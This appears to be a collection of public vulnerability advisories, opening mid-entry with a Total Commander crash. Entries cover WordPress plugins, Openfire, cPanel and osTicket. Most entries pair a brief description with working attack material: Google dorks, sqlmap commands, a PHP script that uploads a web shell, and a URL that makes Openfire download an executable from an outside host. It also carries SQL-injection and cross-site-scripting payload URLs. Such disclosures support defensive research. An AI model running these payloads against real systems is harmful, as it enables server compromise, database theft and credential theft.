 SE handler=41414141
'''

[Steps to Produce the Crash]:
1- Open up 'TOTALCMD.EXE'.
2- Goto Files -> Change Attributes.
3- In time field paste in contents of 'Crash.txt'.
~ Software will crash b/c SEH Overwrite.

[Code for CRASH.txt]
file = open("crash.txt",'w')
file.write("A"*5000)
file.close()

->After Reporting, Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]).
**********************************************************************************************
18. # Exploit Title: WordPress: cp-reservation-calendar 1.1.6 SQLi injection
# Date: 2015-09-15
# Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip
# Version: 1.1.6
# OWASP Top10: A1-Injection

A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6. The vulnerability allows remote attackers to inject SQL commands.

The SQL injection vulnerability is located in the `dex_reservations.php` file. Remote attackers are able to execute their own SQL commands by manipulating request parameters. The security risk of the SQL injection vulnerability is estimated as high with a CVSS (common vulnerability scoring system) count of 8.6. Exploitation of the remote SQL injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote SQL injection results in database management system, web-server and web-application compromise.

============================
vulnerable function code...
============================

function dex_reservations_calendar_load2()
{
    global $wpdb;
    if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
        return;
    @ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");
    //following line is vulnerable...
    $calid = str_replace (TDE_RESERVATIONCAL_PREFIX, "", $_GET["id"]);
    $query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'";
    $row_array = $wpdb->get_results($query, ARRAY_A);
    foreach ($row_array as $row)
    {
        $d1 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S]));
        $d2 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));
        echo $d1."-".$d2."\n";
        echo $row[TDE_RESERVATIONDATA_TITLE]."\n";
        echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";
    }
    exit();
}

The following URL executes the vulnerable function:

http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1

------------------------------------------------------------------------------------
POC using sqlmap tool:::: 

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1" -p id --level=5 --risk=3 --dbms="MySQL" --dbs

##########################################################################

The following URL is also vulnerable:

http://localhost/wordpress/?action=dex_reservations_check_posted_data

post parameters::::
-------------------------------------
dex_reservations_post=1&dex_item=1
------------------------------------

An unauthenticated user can use the following URL to inject malicious SQL code. The [dex_item] POST parameter is vulnerable.

======================
vulnerable code
=====================
is located in `dex_reservations.php`

function code..

function dex_reservations_get_option ($field, $default_value)
{
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if ($dex_option_buffered_id == CP_CALENDAR_ID)
        $value = $dex_option_buffered_item->$field;
    else
    {
        $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );
        $value = $myrows[0]->$field;
        $dex_option_buffered_item = $myrows[0];
        $dex_option_buffered_id = CP_CALENDAR_ID;
    }
    if ($value == '' && $dex_option_buffered_item->calendar_language == '')
        $value = $default_value;
    return $value;
}

When this function is called, the defined CP_CALENDAR_ID must contain an integer, but the parameter [ CP_CALENDAR_ID ] isn't validated.

----------------------------------------------------------------------------
POC using sqlmap tool::::

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1" -p dex_item --dbms="MySQL" --level=5 --risk=3

#############
time-line
2015-03-01: vulnerability found
2015-03-09: reported to vendor
2015-03-21: released cp_reservation_calendar v1.1.7
2015-09-15: full disclosure
19. [+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-FILE-UPLOAD.txt

Vendor:
=========================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp

Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber).

Vulnerability Type:
===================
Unrestricted File Upload

CVE Reference:
==============
N/A

Vulnerability Details:
=====================
The application specifies that Plugin files (.jar) can be uploaded directly by using the form; however, so can the following.

.exe
.php
.jsp
.py
.sh

Exploit code(s):
===============

1) choose some malicious file using the File browser
2) click 'upload plugin'

http://localhost:9090/plugin-admin.jsp

Our malicious uploaded files will be stored under the /openfire/plugins directory.

Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure

Exploitation Technique:
=======================
Local

Severity Level:
=========================================================
Medium

Description:
==========================================================

Request Method(s): [+] POST

Vulnerable Product: [+] Openfire 3.10.2

Vulnerable Parameter(s): [+] fileName

Affected Area(s): [+] Server

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
20. source: https://www.securityfocus.com/bid/57098/info

The Xerte Online plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Xerte Online 0.32 is vulnerable; other versions may also be affected.

##################################################
# Description : Wordpress Plugins - Xerte Online Arbitrary File Upload Vulnerability
# Version : 0.32
# Link : http://wordpress.org/extend/plugins/xerte-online/
# Plugins : http://downloads.wordpress.org/plugin/xerte-online.0.32.zip
# Date : 30-12-2012
# Google Dork : inurl:/wp-content/plugins/xerte-online/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit : PostShell.php

<?php

$code = "[CODE PHP]";

$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('filename' => "/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php", 'filedata' => "$code"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php
21. source: https://www.securityfocus.com/bid/57064/info

cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E
22. [+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-RFI.txt

Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp

Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber).

Vulnerability Type:
=================================
Remote File Inclusion

CVE Reference:
==============
N/A

Vulnerability Details:
=====================
In "available-plugins.jsp" there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet.

On line 40: all that needs to be satisfied is that the parameter is not null.

boolean downloadRequested = request.getParameter("download") != null;
String url = request.getParameter("url");

If the above condition check returns true, the application downloads whatever file you give it.

line 54:

if (downloadRequested) {
    // Download and install new plugin
    updateManager.downloadPlugin(url);
    // Log the event
    webManager.logEvent("downloaded new plugin from "+url, null);
}

Exploit code(s):
================

1) download arbitrary filez e.g.

http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe

Our RFI will be downloaded to the "openfire\plugins" directory.

Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
=========================================================
High

Description:
==========================================================

Request Method(s): [+] GET

Vulnerable Product: [+] Openfire 3.10.2

Vulnerable Parameter(s): [+] download, url

Affected Area(s): [+] Server

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
23. source: https://www.securityfocus.com/bid/57101/info

The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1
24. source: https://www.securityfocus.com/bid/57101/info

The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1
25. source: https://www.securityfocus.com/bid/57111/info

osTicket is prone to multiple input-validation vulnerabilities including:

1. Multiple cross-site scripting vulnerabilities
2. An open-redirection vulnerability
3. Multiple SQL-injection vulnerabilities

An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

osTicket 1.7 DPR3 is vulnerable; other versions may also be affected.

http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22